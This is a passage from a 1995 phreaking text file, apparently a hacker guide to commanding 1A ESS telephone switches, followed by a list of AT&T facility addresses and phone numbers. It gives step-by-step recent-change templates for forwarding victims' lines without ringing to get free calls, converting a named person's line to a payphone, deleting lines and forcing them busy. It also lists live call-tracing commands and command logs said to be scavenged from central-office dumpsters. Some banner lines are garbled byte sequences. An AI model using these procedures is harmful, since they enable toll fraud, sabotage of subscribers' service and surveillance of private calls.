by the switch you are on.
CI-LIST-. Traced line list.
Check Features on Line
-=-=-=-=-=-=-=-=-=-=-=
The VF command is used to check the current settings on a line.
The DN XXXXXXX specifies the phone number of the line you wish to check.
Replace XXXXXXX with the seven digit phone number of the line you are
checking.
VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line.
VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features
Call Features CWT- Call Waiting
CFB- Call Forward Busy - Busy=VM
CFV- Call Forwarding Variable
CFD- Call Forward Don't answer
TWC- Three Way Calling
TTC- Touch Tone
RCY- Ring Cycle
SC1- Speed Calling 1
SC2- Speed Calling 2
UNA- No Long Distance
PXX- Block all LD service (guess)
MWI- Message Waiting Indicator
CHD- centrex(unremarkable)
CPU- centrex(unremarkable)
CLI- Calling Line Identification (CID)
ACB- Automatic Call Back Feature (?)
BLN- Special Toll Billing
FRE- Free Calling
The standard output of a command appears below. The 'DN 348 2141' specifies
the number you are checking. The calling features will be listed on the
second line by their three letter acronyms. This line has call waiting
(CWT), a trace (TRC), and touch tone dialing (TTC).
Example of 1A output:
M 53 TR75 2 DN 348 2141 00000003
CWT TRC TTC
Searching For Free Lines
-=-=-=-=-=-=-=-=-=-=-=-=
The VFY command can be used to check if a line is in use. The output will
list the LEN (Line Equipment Number) for the line and its call features in
octal. If the LEN is all zeros, then that number has not been assigned.
Replace XXXXXXX with the number you wish to check. You must prefix the
phone number with 30. You can also check for unused LEN's using the VFY
command. Use the space bar to stop scrolling and the V-STOP command to
cancel when looking up free LEN's.
VFY-DN-30XXXXXXX. Search for free lines.
VFY-LEN-4100000000. List all free LENs.
VFY-TNN-XXXXXXXX. To get information on trunk.
The output for the VFY-DN command will appear like the one below. Notice
that this number has been assigned a LEN so it is in use.
M 06 TR01 796 9146
0 0 0 0
LEN 01 025 000
001 000 000 000 000 000 4
000 000 000 000 000 000 000 000
0 0 0 0
0 0 0 0 0
Searching for a Particular Feature on a Line (like trace)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
All line information is stored in the switch for its coverage area. The
switch is like a huge database in this sense. You can do global searches
on the switch for any feature. One especially interesting feature to search
for are traced numbers. Traced numbers listed this way are INTERNALLY
traced as opposed to globally traced numbers shown with the CI-LIST- command.
Global and internal trace lists are always very different. And remember,
be a good samaritan and call the person being traced and let them know! ;-)
VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area with
trace on it (takes a sec).
You can exmatch for any LASS feature by replacing the keyword TRACE with any
call feature like call forwarding (CFB) and speed calling (SC1).
To See What Numbers Are on a Speed Calling List
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Another nice use for the VFY command is to see what is on a line's speed
calling list. Replace XXXXXXX with the target phone number. One devious
use is to look at the CO's speed call list to find other internal telco
numbers.
VFY-LIST-09XXXXXXX020000
09=mask 02=single list (one digit speed calling)
20=double list (two digit speed calling)
28= " "
36= " "
44= " "
To Build a Line
-=-=-=-=-=-=-=-
The recent change command (RC) is used to create and modify lines. Because
RC commands are usually very long and complex, they are typed on multiple
lines to simplify them. Each subfield of the data section of the command is
typed on a separate line ended by a slash (\) followed by pressing ctrl-d.
To create a line, you specify LINE in the identification field. Before
a line can be created, you must first locate an unused number by using the
VFY-DN command explained above. Once a free number has been found, you
use the VFY-LEN to find an available LEN. To build a new line, follow
these steps:
First, find spare LEN (VFY-LEN-4100000000.). Next find free line. Now type
in the RC commands using the following commands as a template:
RC:LINE:\ (create a line)
ORD 1\ (execute the command immediately)
TN XXXXXXX\ (telephone number)
LEN XXXXXXXX\ (len found from above)
LCC 1FR\ (line class code 1fr)
CFV\ (call forward)
XXX 288\ (type XXX, space, then the three digit PIC)
ld carrier - 222 - MCI
288 - AT&T
333 - Sprint, etc.)
! (BEWM, don't forget the ctrl-d!!)
(Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE
has taken affect)
Creating Call Forwarding Numbers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The call forwarding feature is the most important feature for hackers. By
creating a line or modifying an existing line with call forwarding, you can
than use it to make free phone calls. You set the line to call forward/
no ring and then give it the call forwarded number. This will allow you
to call the modified line and be instantly forwarded to your pre-chosen
destination.
First create a line using RC:LINE:, then modify the line using the following
commands as a template.
RC:CFV:\ (add call forwarding to a line.. begin: )
ORD 1\ (execute the command immediately)
BASE XXXXXXX\ (base number you are changing)
TO XXXXXXX\ (local - XXXXXXX : ld - XXXXXXXXXX )
PFX\ (set prefix to 1 if ld)
! (BEWM)
To Change Call Forward Number
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
It is safer to modify an existing call forward than to create a new line
solely for this purpose. You can use the VFY command and EXMATCH for CFB to
find lines with call forwarding. Before you can change the call forwarding
'TO' number you must delete the old one. Remove call forward number using
CFV:OUT with the template below.
RC:CFV;OUT:\ (remove call forward number...begin: )
ORD 1\ (execute command immediately)
BASE XXXXXXX\ (number to remove it from)
! (Yeeee-Hahhhahah)
Make Call Forward Not Ring
-=-=-=-=-=-=-=-=-=-=-=-=-=
The only drawback to call forwarding off someone's line is if rings they
might answer. To get around this, you add the call-forward no-ring option
(ICFRR) using the following as a template.
RC:LINE;CHG:\ (recent change line to be specified)
ORD 1\ (execute command immediately)
TN XXXXXXX\ (number you wanna fuck with)
ICFRR\ (this takes the ring off)
! (Go!)
Adding a feature to a line
-=-=-=-=-=-=-=-=-=-=-=-=-=
The RC:LINE;CHG: can also be used to add any other call feature. Use the
same template but change the feature.
RC:LINE;CHG:\ (this is used for changing features)
ORD 1\ (order number)
TN XXXXXXX (telephone number you are fucking with)
TWC\ (replace this with any feature you wish)
! (Fire!)
Removing a Feature
-=-=-=-=-=-=-=-=-=
Use the NO delimiter to remove a feature from a line.
RC:LINE;CHG:\ (change a feature)
ORD 1\ (effective immediately)
TN XXXXXXX\ (telephone number)
CFV NO\ (feature followed by NO)
! (Boo-Ya!)
Change Phone number into payphone
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
You've read about in the Hacker Crackdown, now you too can be 31337 and
change Gail Thackery's phone into a payphone. In fact you can change the
line class code (LCC) to anything you want. To display the LCC of a line
use the following and replace the XXXXXXX with the line you wish to view.
VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code)
DTF = Payphone
1FR = Flat Rate
1MR = Measured Rate
1PC = One Pay Phone
CDF = DTF Coin
PBX = Private Branch Exchange
CFD = Coinless(ANI7) Charge-a-call
INW = InWATS (800!@#)
OWT = OutWATS
PBM = O HO/MO MSG REG (NO ANI)
PMB = LTG = 1 HO/MO (Regular ANI6)
(ani6 and ani7 - only good for DMS)
To change the line into a payphone use the RC:LINE;CHG command and modify
the LCC like the example below.
RC:LINE;CHG;\ (this is used for changing features)
ORD 1\ (order number)
TN XXXXXXX\ (telephone number you are fucking with)
LCC DTF\ (line class code you are changing to)
! (Make it so.)
*(You may have to remove some LASS features when doing this)*
To Kill a Line and Remove It Permanently
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
If you need to delete a line you have created (or haven't) use the following
syntax.
RC:LINE;OUT:\ (remove line)
ORD 1\ (effective immediately)
TN XXXXXXX\ (on this number)
! (GO!)
Monitoring Phone Calls
-=-=-=-=-=-=-=-=-=-=-=
There are powerful utilities to monitor calls and affect phone lines
available on a 1A. The T-DN- commands allow you to check the current
status of line and make it busy or idle. If a line happens to be active
you can use the NET-LINE- command to trace the call and find the numbers
for both calling parties.
T-DN-RD XXXXXXX. See if call in progress.
output: =1 line busy
=0 line idle
T-DN-MB XXXXXXX. Make line busy.
T-DN-MI XXXXXXX. Make line idle.
NET-LINE-XXXXXXX0000. To do a live trace on a phonenumber thru
switch.
NET-TNN-XXXXXX Same as above for trunk trace
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Appendix 1 - Common output messages seen on 1A switches
-=-=-=-=-=
** ALARM **
AR01 Office alarm
AR02 Alarm retired or transferred
AR03 Fuse blown
AR04 Unknown alarm scan point activated
AR05 Commercial power failure
AR06 Switchroom alarm via alarm grid
AR07 Power plant alarm
AR08 Alarm circuit battery loss
AR09 AMA bus fuse blown
AR10 Alarm configuration has been changed (retired,inhibited)
AR11 Power converter trouble
AR13 Carrier group alarm
AR15 Hourly report on building and power alarms
** AUTOMATIC TRUNK TEST **
AT01 Results of trunk test
** CARRIER GROUP **
CG01 Carrier group in alarm
CG03 Reason for above
** COIN PHONE **
CN02 List of pay phones with coin disposal problems
CN03 Possible Trouble
CN04 Phone taken out of restored service because of possible coin fraud
** COPY **
COPY Data copied from one address to another
** CALL TRACE **
CT01 Manually requested trace line to line, information follows
CT02 Manually requested trace line to trunk, information follows
CT03 Intraoffice call placed to a number with CLID
CT04 Interoffice call placed to a number with CLID
CT05 Call placed to number on the CI list
CT06 Contents of the CI list
CT07 ACD related trace
CT08 ACD related trace
CT09 ACD related trace
** DIGITAL CARRIER TRUNK **
DCT COUNTS Count of T carrier errors
** MEMORY DIAGNOSTICS **
DGN Memory failure in cs/ps diagnostic program
** DIGITAL CARRIER "FRAME" ERRORS **
FM01 DCT alarm activated or retired
FM02 Possible failure of entire bank not just frame
FM03 Error rate of specified digroup
FM04 Digroup out of frame more than indicated
FM05 Operation or release of the loop terminal relay
FM06 Result of digroup circuit diagnostics
FM07 Carrier group alarm status of specific group
FM08 Carrier group alarm count for digroup
FM09 Hourly report of carrier group alarms
FM10 Public switched digital capacity failure
FM11 PUC counts of carrier group errors
** MAINTENANCE **
MA02 Status requested, print out of MACII scratch pad
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system
MA05 Maintenance interrupt count for last hour
MA06 Scanners,network and signal distributors in trouble
MA07 Successful switch of duplicated unit (program store etc.)
MA08 Excessive error rate of named unit
MA09 Power should not be removed from named unit
MA10 OK to remove paper
MA11 Power manually removed from unit
MA12 Power restored to unit
MA13 Indicates central control active
MA15 Hourly report of # of times interrupt recovery program acted
MA17 Centrex data link power removed
MA21 Reports action taken on MAC-REX command
MA23 4 minute report, emergency action phase triggers are inhibited
** MEMORY **
MN02 List of circuits in trouble in memory
** NETWORK TROUBLE **
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble Trunk to Line
NT03 Network path trouble Line to Line
NT04 Network path trouble Trunk to Trunk
NT06 Hourly report of network frames made busy
NT10 Network path failed to restore
** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS Call store status
OP:DUSTATUS Data unit status
OP:ERAPDATA Error analysis database output
OP:INHINT Hourly report of inhibited devices
OP:LIBSTAT List of active library programs
OP:OOSUNITS Units out of service
OP:PSSTATUS Program store status
** PLANT MEASUREMENTS **
PM01 Daily report
PM02 Monthly report
PM03 Response to a request for a specific section of report
PM04 Daily summary of IC/IEC irregularities
** REPORT **
REPT:ADS FUNCTION Reports that a ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
REPT:ADS PROCEDURAL ERROR You fucked up
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL System programs that are off or on
REPT:RC CENSUS Hourly report on recent changes
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
** RECENT CHANGE **
RC18 RC message response
** REMOVE **
RMV Removed from service
** RESTORE **
RST Restored to service status
** RINGING AND TONE PLANT **
RT04 Status of monitors
** SOFTWARE AUDIT **
SA01 Call store memory audit results
SA03 Call store memory audit results
** SIGNAL IRREGULARITY **
SIG IRR Blue box detection
SIG IRR INHIBITED Detector off
SIG IRR TRAF Half hour report of traffic data
** TRAFFIC CONDITION **
TC15 Reports overall traffic condition
TL02 Reason test position test was denied
TL03 Same as above
** TRUNK NETWORK **
TN01 Trunk diagnostic found trouble
TN02 Dial tone delay alarm failure
TN04 Trunk diag request from test panel
TN05 Trunk test procedural report or denials
TN06 Trunk state change
TN07 Response to a trunk type and status request
TN08 Failed incoming or outgoing call
TN09 Network relay failures
TN10 Response to TRK-LIST input, usually a request from test position
TN11 Hourly, status of trunk undergoing tests
TN16 Daily summary of precut trunk groups
** TRAFFIC OVERLOAD CONDITION **
TOC01 Serious traffic condition
TOC02 Reports status of less serious overload conditions
** TRANSLATION ** (shows class of service, calling features etc.)
TR01 Translation information, response to VFY-DN
TR03 Translation information, response to VFY-LEN
TR75 Translation information, response to VF:DNSVY
** **
TW02 Dump of octal contents of memory
Trace Output Appearance (COT - Customer Oriented Trace)
A 03 CT04 22 03 02 05 11 26 359 705 8500 <-- NUMBER CALLED
CPN 212 382 8923 <-- WHO CALLED
01/14/95 22:03:02 <-- TIME/DATE
#236 <-- JOB NUMBER
Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
-=-=-=-=-=
RMV::NPC 69!
UTL::QRY.CMAP 136!
UTL::QRY.SCON to 135! (as far out as to 12003!)
UTL::QRY.SCON 13615/01!
UTL::QRY.ALMS!
UTL::QRY,WHO!
UTL::QRY,ALL!
UTL::QRY,FPKG!
UTL::QRY,UNIT1,FTMI1, EQL
GRTH::UNIT1! (FT100) <-- comment written by command
GRTH::UNI1,FTMI1, EQL(L,R) (2,2) <-- Example
UTL::QRY.!
RMV::LINK 3!
DGN::LINK 3!
RST::LINK 3!
UTL::QRY.TPS!
RST::TAPE! (This and the next two commands were
UTL::BMTR.FROM DISK.TO TAPE! ALWAYS found together, and are pretty
RMV::TAPE! obvious)
SDIS::FROM 11204/03.TO 11204/04!
UTL::QRY.SCON.CH.TO 11204!
UTL::QRY.CMAP.TO 11204/03!
UTL::QRY,CMAP 01117!
SCON::RATE 96.FROM 11204/03.TO 11204/4!
LOGIN::USER DAX\
UTL::EQD,NPCS!
ADD::LINK 2,NPCAD E!
UTL::LOC,ETSI 101!
|_|____________Bay (These show physical locations
|____________Unit of trunks)
UTL::LOC,NPC 01117!
output - 1-01-38
|__|__|_________Bay
|__|_________Unit
|_________38(1/8) inches
Appendix 3 - Suggested reading
-=-=-=-=-=
Acronyms 1988 (Phrack #20, file 11)
Central Office Operations by Agent Steal (LoDTJ #4, file 4)
ESS & 1A Switching Systems by Ninja Master
The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
Operator Services Position System by Bandito (Phun #5, file 8)
Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2)
__________________________________________________________________________
(C)opywrong 1995, DeadKat Inc.
All wrongs denied.
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> Thank you for abusing AT&T <20>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Part II
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> by Major & Dead Kat
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Some of the "Frequently Visited AT&T Locations":
LOCATION CITY ST/ZIP TELEPHONE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~~ ~~~~~~~~~~~
AT&T 1 PERIMETER PARK S. BIRMINGHAM AL 35243 205-969-4000
BIRMINGHAM AMO 300 CHASE PK.SO., RIVERCHASE BIRMINGHAM AL 35243 205-988-9300
MONTGOMERY MMC 2855 SELMA HIGHWAY MONTGOMERY AL 36108 205-281-6200
AT&T 3280 DAUPHIN ST., BLDG B MOBILE AL 36606 205-470-1000
LITTLE ROCK WORKS 7600 INTERSTATE #30 LTTL ROCK AR 72209 501-569-4411
AT&T 10825 #2 FINANCIAL CNTR. SUITE 300 LTTL ROCK AR 72211 501-223-1000
PHOENIX WORKS 505 N.51ST AVE PHOENIX AZ 85002 602-233-5000
AT&T MICROELECT. SALES 432 N. 44TH ST. PHOENIX AZ 85008 602-204-1100
PHOENIX CAC 3750 W. INDIAN SCHOOL RD. PHOENIX AZ 85019 602-269-6666
AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-481-9100
AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-482-5799
LOS ANGELES CP (SVC) 2400 YATES AVE L.A. CA 90040 213-726-5000
CYPRESS INNST. 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6200
AT&T MICROELEC. SLES 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6223
AT&T 200 NO. WESTLAKE BLVD. SUITE 103 TH.OAKS CA 91362 805-373-9390
VANDENBURG AFB FED. SYS LOMPOC CA 93437 805-866-1611
AT&T FED SYS 3201 SKYWAY DR. SAN MONICA CA 93455 805-349-8649
AT&T 1111 E. HERNDON AVE. SUITE 31 FRESNO CA 93710 209-449-4200
AT&T SAND HILL RD SUITE 216 MENLO PARK CA 94025 415-324-6000
AT&T 224 AIRPORT PKWY SAN JOSE CA 94086 408-452-3200
SUNNYVALE REG. CTR. 1090 E. DUANE AVE. SUNNYVALE CA 94086 408-522-4000
HAYWARD SVC 1288 SAN LUIS OBISPO AVE. HAYWARD CA 94544 415-475-5000
AT&T 4430 ROSEWOOD DR. PLEASANTON CA 94566 415-224-1000
AT&T 1717 DOOLITTLE DR. SN LEANDRO CA 94577 415-678-1000
SAN RAMON AMO BLD 2440 CAMINO RAMON SAN RAMON CA 94583 415-830-4300
AT&T 2201 BROADWAY OAKLAND CA 94612 415-273-2800
PACIFIC REGION MMC 3301 INDUSTRIAL AVE. ROCKLIN CA 95677 916-645-8911
AT&T 8950 CALIFORNIA CNTR. DR. SACRAMENTO CA 95826 916-361-4600
DENVER SVC CNTR. 11900 E. CORNELL AVE. AURORA CO 80014 303-368-2000
AT&T 3190 S. VAUGHN WAY AURORA CO 80014 303-695-5000
AT&T BMG 6200 S. SYRACUSE WAY ENGLEWOOD CO 80111 303-850-7000
AT&T-NS SALES 707 17TH ST. DENVER CO 80202 303-291-4001
DENVER SVC 2551 E. 40TH AVE. DENVER CO 80205 303-291-4200
DENVER WORKS 1200 W. 120TH AVE DENVER CO 80234 303-538-1200
AT&T-BL DENVER NO. 12110 PECOS ST. WESTMNSTR CO 80234 303-538-1813
AT&T-BL 11900 N. PECOS ST. DENVER CO 80234 303-538-4011
AT&T 7979 E. TUFTS AVE. DENVER CO 80237 303-290-3100
AT&T 13952 DENVER WEST PKWY. GOLDEN CO 80401 303-273-2000
AT&T FED SYS 6200 S. SYRACUSE WAY ENGLEWOOD CO 80401 303-793-8800
AT&T-NS SALES 6300 GATEWAY DR. CYPRESS CO 90630 714-220-6200
AT&T 8 TWO MILE RD FARMINGTON CT 06032 203-678-3800
ORANGE CUST. REPAIR CTR. 50 BOSTON POST RD. ORANGE CT 06477 203-795-4721
CONNECTICUT AMO 2750 DIXWELL AVE HAMDEN CT 06518 203-287-4070
AT&T 777 LONGRIDGE RD STAMFORD CT 06851 203-845-5600
AT&T 1825 I ST. N.W. SUITE 800 WASHINGTON DC 20006 202-429-1300
WASH-DC 1120 20TH ST.,NW WASHINGTON DC 20006 202-457-2000
AT&T 222 DELAWARE AVE. WILMINGTON DE 19801 302-888-6000
AT&T 1401 E. BELMONT ST. PENSACOLA FL 32501 904-432-7454
AT&T 151 S. WYMORE RD ALTA SPGS. FL 32714 407-869-2200
AT&T 2301 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
AT&T 2400 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
AT&T 850 TRAFALGAR COURT MAITLAND FL 32751 407-660-3200
AT&T 901 LAKE DESTINY DR. ORLANDO FL 32809 407-875-4400
AT&T 8221 EXCHANGE DRIVE ORLANDO FL 32809 407-850-3000
AT&T 6039 S. RIO GRANDE AVE. ORLANDO FL 32809 407-850-8000
AT&T MICROELECT.9333 S. JOHN YOUNG PKWY ORLANDO FL 32819 407-345-6000
AT&T 9701 S. JOHN YOUNG PARKWAY ORLANDO FL 32819 407-351-7100
AT&T 100 WEST CYPRESS CREEK FT. LAUD. FL 33309 305-493-6100
ATLANTA WKS 2000 NORTHEAST EXPRESSWAY NORCROSS GA 30071 404-447-2000
AT&T FED SYS. 1975 LAKESIDE PKWAY TUCKER GA 30085 404-496-8200
AT&T MICROELECT. SALES 3295 RIVER EXCH.DR NORCROSS GA 30092 404-390-5000
AT&T 1200 PEACHTREE ST. NE ATLANTA GA 30309 404-390-5000
ATLANTA FOC 7840 ROSEWELL RD. ATLANTA GA 30328 404-390-5000
ATLANTA S. CTR. 6701 ROSEWELL RD. NE. ATLANTA GA 30328 404-573-4000
AT&T 2970 CLAIRMONT RD. 4TH FL ATLANTA GA 30329 404-248-2126
ATLANTA SVC 5885 FULTON IND'L BLVD. SW. ATLANTA GA 30336 404-346-4000
ATL-ACCTS PAY 365 NORTHRIDGE RD. ATLANTA GA 30338 404-392-8900
AT&T 2800 CENTURY CTR. PKWY ATLANTA GA 30345 404-320-3800
ATLANTA DATA SYS 211 PERIMETER CTR. PKWY ATLANTA GA 30346 404-399-0100
ATLANTA FIN.OPS MORGAN FLS ROSEWELL RD.,NE. ATLANTA GA 30350 404-390-5000
AT&T 2300 NORTHLAKE CTR. TUCKER GA 30350 404-496-8200
AT&T MMC INTERSTATE 80 & HIGHWAY 630 UNDERWOOD IA 51519 712-566-3300
ROLLING MEADOWS 3800 GOLD RD. ROLNG MDWS IL 60008 708-290-2000
AT&T MICROELECT. SALES 500 PARK BLVD ITASCA IL 60143 312-855-6300
AT&T 150 MARTINDALE RD SHAUMBERG IL 60173 708-605-5000
AT&T REPAIR & SRV. CTR. 1700 HAWTHORNE LN. W CHICAGO IL 60185 312-293-5100
AT&T DATA SVCS 180 HANSEN CT. WOODDALE IL 60191 708-860-8100
AT&T FED SYS 1411 OPUS PLACE DOWNERS GR IL 60515 708-810-4000
AT&T 1111 W. 22ND ST. OAKBROOK IL 60521 708-571-5320
UIS SHOWCASE 2600 WARRENVILLE RD. LISLE IL 60532 708-260-7900
NWSW CTR. 2600 WARRENVILLE RD. LISLE IL 60532 708-510-4000
NWSW CTR. CORPORATE LAKES 2500 CABOT DRIVE LISLE IL 60532 708-510-4000
LISLE PS 850 WARRENVILLE RD. LISLE IL 60532 708-719-1005
AT&T LISLE CTR 4513 WESTERN AVE. LISLE IL 60532 708-810-6000
CEO-WEST 1195 SUMMER HILL DRIVE LISLE IL 60532 708-971-5000
MONTGOMERY WORKS 800 S. RIVER ST. MONTGOMERY IL 60538 708-859-4000
WARRENVILLE 28W. 615 FERRY RD. WARRENVILE IL 60555 708-393-8000
INDIAN HILL COURT 1000 E. WARRENVILLE RD. NAPERVILLE IL 60566 708-305-3000
IH PARK-BL 200 PARK PLAZA NAPERVILLE IL 60567 708-979-2000
AT&T ONE S. WACKER DRIVE CHICAGO IL 60606 708-592-6558
AT&T 11595 N. MERIDIAN ST. CARMEL IN 46032 317-844-6674
INDIANAPOLIS INST.8700ROBERTS DR SUITE 100 FISCHERS IN 46038 317-578-0160
INDIANA AMO N. 151 N.DELAWARE ST. SUITE565 INDIANAPOL IN 46204 317-632-9161
INDIANAPOLIS SVC (CIC) 2855 N. FRANKLIN RD. INDIANAPOL IN 46219 317-352-0011
INDIANAPOLIS HERITAGE PK 6612 E. 75TH ST. INDIANAPOL IN 46250 317-845-8980
AT&T 404 COLUMBIA PLACE-SUITE 210 SOUTH BEND IN 46601 219-232-2000
KANSAS CITY SVC CNTR. 9501 W. 67TH ST. MERRIAM KS 66203 913-677-6000
AT&T 5401 COLLEGE BLVD. LEAWOOD KS 66211 913-491-9840
AT&T 200 NO. BROADWAY, SUITE 400 WICHITA KS 67202 316-269-7500
AT&T 9300 SHELBYVILLE RD LOUISVILLE KY 40222 502-429-1000
AT&T 3500 N. CAUSEWAY BLVD. 10th FLOOR METAIRIE LA 70002 504-832-4300
AT&T 4354 S. SHERWOOD FOREST BLVD. BATONROUGE LA 70816 504-922-6600
AT&T 3010 KNIGHT ST., SUITE 190 SHREVEPORT LA 71105 318-869-2041
SHREVEPORT WORKS 9595 MANSFIELD RD. SHREVEPORT LA 71108 318-459-6000
AT&T 365 CADWELL DR. RM 168 SPRINGFLD MA 01104 413-785-4400
AT&T MICROELECT. 111 SPEEN ST. FRAMINGHAM MA 01701 508-626-2161
ANDOVER 20 SHATTUCK RD. ANDOVER MA 01810 508-691-3000
AT&T-WARD HILL 75 FOUNDATION AVE. WARD HILL MA 01835 508-374-5600
MERRIMACK VALLEY 1600 OSGOOD ST. N.ANDOVER MA 01845 508-960-2000
AT&T ACCT MGMT 800 BOYLESTON ST. BOSTON MA 02110 617-437-8800
AT&T-BL 800 BOYLESTON ST. BOSTON MA 02110 617-437-8870
AT&T NAT'L ACCTS 100 SUMMER ST. BOSTON MA 02110 617-574-6000
NEW ENGLAND SVC 705 MT. AUBURN ST. WATERTOWN MA 02172 617-923-0765
AT&T 430 BEDFORD ST. LEXINGTON MA 02173 617-863-9000
BETHESDA AMO 6410 ROCKLEDGE DR. BETHESDA MD 20817 301-493-2000
AT&T FED SYS 1100 WAYNE AVE SLVR SPGS MD 20910 301-495-7400
COCKEYSVILLE N.S. SALES 225 SCHILLING CRCL. COCKEYVLLE MD 21030 301-584-1234
FEDERAL SYS. MD 9160 GUILFORD RD COLUMBIA MD 21045 301-369-7700
COULUMBIA MD 9305D GERWIG LN. COLUMBIA MD 21046 301-381-6150
AT&T 400 EAST PRATT ST. BALTIMORE MD 21202 301-576-5700
TRANSPACIFIC COMM.,INC.1001 MCCOMAS ST. BALTIMORE MD 21230 301-385-0425
AT&T 136 COMMERCIAL ST., FLR 2 PORTLAND ME 04101 207-761-1400
AT&T 26957 NORTHWESTERN HWY. SOUTHFIELD MI 48034 313-353-6210
AT&T-NS 27777 FRANKLIN RD., SUITE 500 SOUTHFIELD MI 48034 313-355-7200
NILES MMC 2121 W. CHICAGO RD. NILES MI 49120 616-684-6400
AT&T 2861 CHARLEROIX, S.E. GRAND RPDS MI 49546 616-957-8200
AT&T 4480 W. ROUNDLAKE RD. ARDEN HLLS MN 55112 612-633-4803
MINNEAPOLIS SC 2230 COUNTY RD. H2 MOUNDSVIEW MN 55112 612-780-7750
AT&T 420 THIRD AVE. S., RM 670 MINEAPOLIS MN 55415 612-626-9300
AT&T MICROELECT. SALES W 82ND ST BLOOMINGTN MN 55431 612-885-4600
BALLWIN 1111 WOODS MILL RD. BALLWIN MO 63011 314-891-2000
ST.LOUIS-NS 701 MARKET ST. SUITE 900 ST. LOUIS MO 63101 314-891-5000
